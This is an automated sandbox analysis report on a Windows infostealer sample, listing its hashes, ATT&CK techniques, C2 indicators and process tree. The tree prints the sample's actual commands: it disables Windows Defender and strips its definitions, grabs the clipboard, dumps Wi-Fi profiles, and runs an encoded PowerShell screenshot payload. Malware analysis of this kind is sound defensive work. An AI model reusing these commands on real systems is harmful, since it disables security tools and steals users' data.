addfab49b4bdc217eaf50439856f0ffd9ef812c3828f1e2467d87825c85a5750

Analysis

max time kernel
10s
max time network
12s
platform
windows11-21h2_x64
resource
win11-20241007-it
resource tags

arch:x64arch:x86image:win11-20241007-itlocale:it-itos:windows11-21h2-x64systemwindows
submitted
19-12-2024 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DA NON CLICCARE.exe
Size

7.6MB
MD5

d2cebe6cd6b57bb9d526cb35c064b964
SHA1

42d8530de3b7e18c736f9f2c87f553ea0db3a9be
SHA256

addfab49b4bdc217eaf50439856f0ffd9ef812c3828f1e2467d87825c85a5750
SHA512

e0cf350ca538eba97537ddcfea3e265d3d112d5f9ba60f7636fcf76121fece4ccfb9dac45c75b2e541507744de0fb60ba120d45d4c89c8740134b86c10c654e6
SSDEEP

196608:82HYIwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/j/:GIHziK1piXLGVE4Ue0VJj

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe
4620	powershell.exe
4652	powershell.exe
4592	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3472	cmd.exe
1432	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4820	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe
1264	DA NON CLICCARE.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5084	tasklist.exe
1624	tasklist.exe
3528	tasklist.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002aac1-21.dat	upx
behavioral2/memory/1264-25-0x00007FF991420000-0x00007FF991A83000-memory.dmp	upx
behavioral2/files/0x001a00000002aab4-27.dat	upx
behavioral2/memory/1264-30-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp	upx
behavioral2/files/0x001900000002aabf-29.dat	upx
behavioral2/memory/1264-48-0x00007FF9AAD90000-0x00007FF9AAD9F000-memory.dmp	upx
behavioral2/files/0x001900000002aabb-47.dat	upx
behavioral2/files/0x001900000002aaba-46.dat	upx
behavioral2/files/0x001900000002aab9-45.dat	upx
behavioral2/files/0x001900000002aab8-44.dat	upx
behavioral2/files/0x001900000002aab7-43.dat	upx
behavioral2/files/0x001900000002aab6-42.dat	upx
behavioral2/files/0x001900000002aab5-41.dat	upx
behavioral2/files/0x001c00000002aab0-40.dat	upx
behavioral2/files/0x001900000002aac6-39.dat	upx
behavioral2/files/0x001900000002aac5-38.dat	upx
behavioral2/files/0x001900000002aac4-37.dat	upx
behavioral2/files/0x001900000002aac0-34.dat	upx
behavioral2/files/0x001900000002aabe-33.dat	upx
behavioral2/memory/1264-54-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp	upx
behavioral2/memory/1264-56-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp	upx
behavioral2/memory/1264-58-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp	upx
behavioral2/memory/1264-60-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp	upx
behavioral2/memory/1264-62-0x00007FF9A85F0000-0x00007FF9A8609000-memory.dmp	upx
behavioral2/memory/1264-66-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp	upx
behavioral2/memory/1264-64-0x00007FF9A9340000-0x00007FF9A934D000-memory.dmp	upx
behavioral2/memory/1264-71-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp	upx
behavioral2/memory/1264-72-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp	upx
behavioral2/memory/1264-74-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp	upx
behavioral2/memory/1264-70-0x00007FF991420000-0x00007FF991A83000-memory.dmp	upx
behavioral2/memory/1264-82-0x00007FF9A2B10000-0x00007FF9A2BC3000-memory.dmp	upx
behavioral2/memory/1264-81-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp	upx
behavioral2/memory/1264-79-0x00007FF9A9300000-0x00007FF9A930D000-memory.dmp	upx
behavioral2/memory/1264-83-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp	upx
behavioral2/memory/1264-78-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp	upx
behavioral2/memory/1264-76-0x00007FF9A85D0000-0x00007FF9A85E4000-memory.dmp	upx
behavioral2/memory/1264-105-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp	upx
behavioral2/memory/1264-253-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp	upx
behavioral2/memory/1264-260-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp	upx
behavioral2/memory/1264-261-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp	upx
behavioral2/memory/1264-281-0x00007FF991420000-0x00007FF991A83000-memory.dmp	upx
behavioral2/memory/1264-305-0x00007FF9A2D30000-0x00007FF9A2DFE000-memory.dmp	upx
behavioral2/memory/1264-309-0x00007FF9A9300000-0x00007FF9A930D000-memory.dmp	upx
behavioral2/memory/1264-308-0x00007FF9A2B10000-0x00007FF9A2BC3000-memory.dmp	upx
behavioral2/memory/1264-307-0x00007FF9A85D0000-0x00007FF9A85E4000-memory.dmp	upx
behavioral2/memory/1264-306-0x00007FF99FCD0000-0x00007FF9A0203000-memory.dmp	upx
behavioral2/memory/1264-304-0x00007FF9A35A0000-0x00007FF9A35D4000-memory.dmp	upx
behavioral2/memory/1264-303-0x00007FF9A9340000-0x00007FF9A934D000-memory.dmp	upx
behavioral2/memory/1264-302-0x00007FF9A85F0000-0x00007FF9A8609000-memory.dmp	upx
behavioral2/memory/1264-301-0x00007FF9A2FB0000-0x00007FF9A312F000-memory.dmp	upx
behavioral2/memory/1264-300-0x00007FF9A8610000-0x00007FF9A8635000-memory.dmp	upx
behavioral2/memory/1264-299-0x00007FF9A8640000-0x00007FF9A8659000-memory.dmp	upx
behavioral2/memory/1264-298-0x00007FF9A92A0000-0x00007FF9A92CB000-memory.dmp	upx
behavioral2/memory/1264-297-0x00007FF9AAD90000-0x00007FF9AAD9F000-memory.dmp	upx
behavioral2/memory/1264-296-0x00007FF9A9350000-0x00007FF9A9377000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3500	cmd.exe
4892	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3844	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4208	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4592	powershell.exe
2796	powershell.exe
4592	powershell.exe
2796	powershell.exe
1432	powershell.exe
1432	powershell.exe
2816	powershell.exe
2816	powershell.exe
2816	powershell.exe
1432	powershell.exe
4620	powershell.exe
4620	powershell.exe
2792	powershell.exe
2792	powershell.exe
4652	powershell.exe
4652	powershell.exe
4896	powershell.exe
4896	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	5084	tasklist.exe
Token: SeDebugPrivilege	1624	tasklist.exe
Token: SeDebugPrivilege	3528	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4280	WMIC.exe
Token: SeSecurityPrivilege	4280	WMIC.exe
Token: SeTakeOwnershipPrivilege	4280	WMIC.exe
Token: SeLoadDriverPrivilege	4280	WMIC.exe
Token: SeSystemProfilePrivilege	4280	WMIC.exe
Token: SeSystemtimePrivilege	4280	WMIC.exe
Token: SeProfSingleProcessPrivilege	4280	WMIC.exe
Token: SeIncBasePriorityPrivilege	4280	WMIC.exe
Token: SeCreatePagefilePrivilege	4280	WMIC.exe
Token: SeBackupPrivilege	4280	WMIC.exe
Token: SeRestorePrivilege	4280	WMIC.exe
Token: SeShutdownPrivilege	4280	WMIC.exe
Token: SeDebugPrivilege	4280	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4280	WMIC.exe
Token: SeRemoteShutdownPrivilege	4280	WMIC.exe
Token: SeUndockPrivilege	4280	WMIC.exe
Token: SeManageVolumePrivilege	4280	WMIC.exe
Token: 33	4280	WMIC.exe
Token: 34	4280	WMIC.exe
Token: 35	4280	WMIC.exe
Token: 36	4280	WMIC.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeIncreaseQuotaPrivilege	4280	WMIC.exe
Token: SeSecurityPrivilege	4280	WMIC.exe
Token: SeTakeOwnershipPrivilege	4280	WMIC.exe
Token: SeLoadDriverPrivilege	4280	WMIC.exe
Token: SeSystemProfilePrivilege	4280	WMIC.exe
Token: SeSystemtimePrivilege	4280	WMIC.exe
Token: SeProfSingleProcessPrivilege	4280	WMIC.exe
Token: SeIncBasePriorityPrivilege	4280	WMIC.exe
Token: SeCreatePagefilePrivilege	4280	WMIC.exe
Token: SeBackupPrivilege	4280	WMIC.exe
Token: SeRestorePrivilege	4280	WMIC.exe
Token: SeShutdownPrivilege	4280	WMIC.exe
Token: SeDebugPrivilege	4280	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4280	WMIC.exe
Token: SeRemoteShutdownPrivilege	4280	WMIC.exe
Token: SeUndockPrivilege	4280	WMIC.exe
Token: SeManageVolumePrivilege	4280	WMIC.exe
Token: 33	4280	WMIC.exe
Token: 34	4280	WMIC.exe
Token: 35	4280	WMIC.exe
Token: 36	4280	WMIC.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeIncreaseQuotaPrivilege	2508	WMIC.exe
Token: SeSecurityPrivilege	2508	WMIC.exe
Token: SeTakeOwnershipPrivilege	2508	WMIC.exe
Token: SeLoadDriverPrivilege	2508	WMIC.exe
Token: SeSystemProfilePrivilege	2508	WMIC.exe
Token: SeSystemtimePrivilege	2508	WMIC.exe
Token: SeProfSingleProcessPrivilege	2508	WMIC.exe
Token: SeIncBasePriorityPrivilege	2508	WMIC.exe
Token: SeCreatePagefilePrivilege	2508	WMIC.exe
Token: SeBackupPrivilege	2508	WMIC.exe
Token: SeRestorePrivilege	2508	WMIC.exe
Token: SeShutdownPrivilege	2508	WMIC.exe
Token: SeDebugPrivilege	2508	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 1264	4676	DA NON CLICCARE.exe	77
PID 4676 wrote to memory of 1264	4676	DA NON CLICCARE.exe	77
PID 1264 wrote to memory of 4980	1264	DA NON CLICCARE.exe	78
PID 1264 wrote to memory of 4980	1264	DA NON CLICCARE.exe	78
PID 1264 wrote to memory of 3708	1264	DA NON CLICCARE.exe	79
PID 1264 wrote to memory of 3708	1264	DA NON CLICCARE.exe	79
PID 4980 wrote to memory of 4592	4980	cmd.exe	82
PID 4980 wrote to memory of 4592	4980	cmd.exe	82
PID 3708 wrote to memory of 2796	3708	cmd.exe	83
PID 3708 wrote to memory of 2796	3708	cmd.exe	83
PID 1264 wrote to memory of 904	1264	DA NON CLICCARE.exe	84
PID 1264 wrote to memory of 904	1264	DA NON CLICCARE.exe	84
PID 1264 wrote to memory of 2876	1264	DA NON CLICCARE.exe	85
PID 1264 wrote to memory of 2876	1264	DA NON CLICCARE.exe	85
PID 1264 wrote to memory of 3640	1264	DA NON CLICCARE.exe	88
PID 1264 wrote to memory of 3640	1264	DA NON CLICCARE.exe	88
PID 2876 wrote to memory of 5084	2876	cmd.exe	90
PID 2876 wrote to memory of 5084	2876	cmd.exe	90
PID 1264 wrote to memory of 3472	1264	DA NON CLICCARE.exe	91
PID 1264 wrote to memory of 3472	1264	DA NON CLICCARE.exe	91
PID 1264 wrote to memory of 3504	1264	DA NON CLICCARE.exe	93
PID 1264 wrote to memory of 3504	1264	DA NON CLICCARE.exe	93
PID 904 wrote to memory of 1624	904	cmd.exe	95
PID 904 wrote to memory of 1624	904	cmd.exe	95
PID 1264 wrote to memory of 2244	1264	DA NON CLICCARE.exe	96
PID 1264 wrote to memory of 2244	1264	DA NON CLICCARE.exe	96
PID 1264 wrote to memory of 3500	1264	DA NON CLICCARE.exe	98
PID 1264 wrote to memory of 3500	1264	DA NON CLICCARE.exe	98
PID 1264 wrote to memory of 1652	1264	DA NON CLICCARE.exe	99
PID 1264 wrote to memory of 1652	1264	DA NON CLICCARE.exe	99
PID 1264 wrote to memory of 1208	1264	DA NON CLICCARE.exe	101
PID 1264 wrote to memory of 1208	1264	DA NON CLICCARE.exe	101
PID 3504 wrote to memory of 3528	3504	cmd.exe	103
PID 3504 wrote to memory of 3528	3504	cmd.exe	103
PID 3640 wrote to memory of 4280	3640	cmd.exe	104
PID 3640 wrote to memory of 4280	3640	cmd.exe	104
PID 3472 wrote to memory of 1432	3472	cmd.exe	107
PID 3472 wrote to memory of 1432	3472	cmd.exe	107
PID 3500 wrote to memory of 4892	3500	cmd.exe	108
PID 3500 wrote to memory of 4892	3500	cmd.exe	108
PID 1652 wrote to memory of 4208	1652	cmd.exe	109
PID 1652 wrote to memory of 4208	1652	cmd.exe	109
PID 2244 wrote to memory of 4392	2244	cmd.exe	110
PID 2244 wrote to memory of 4392	2244	cmd.exe	110
PID 1208 wrote to memory of 2816	1208	cmd.exe	111
PID 1208 wrote to memory of 2816	1208	cmd.exe	111
PID 1264 wrote to memory of 4360	1264	DA NON CLICCARE.exe	112
PID 1264 wrote to memory of 4360	1264	DA NON CLICCARE.exe	112
PID 4360 wrote to memory of 548	4360	cmd.exe	114
PID 4360 wrote to memory of 548	4360	cmd.exe	114
PID 1264 wrote to memory of 3536	1264	DA NON CLICCARE.exe	115
PID 1264 wrote to memory of 3536	1264	DA NON CLICCARE.exe	115
PID 3536 wrote to memory of 3188	3536	cmd.exe	117
PID 3536 wrote to memory of 3188	3536	cmd.exe	117
PID 1264 wrote to memory of 3560	1264	DA NON CLICCARE.exe	119
PID 1264 wrote to memory of 3560	1264	DA NON CLICCARE.exe	119
PID 2816 wrote to memory of 2996	2816	powershell.exe	121
PID 2816 wrote to memory of 2996	2816	powershell.exe	121
PID 3560 wrote to memory of 3792	3560	cmd.exe	122
PID 3560 wrote to memory of 3792	3560	cmd.exe	122
PID 1264 wrote to memory of 968	1264	DA NON CLICCARE.exe	145
PID 1264 wrote to memory of 968	1264	DA NON CLICCARE.exe	145
PID 968 wrote to memory of 4204	968	cmd.exe	125
PID 968 wrote to memory of 4204	968	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe
"C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe
  "C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DA NON CLICCARE.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
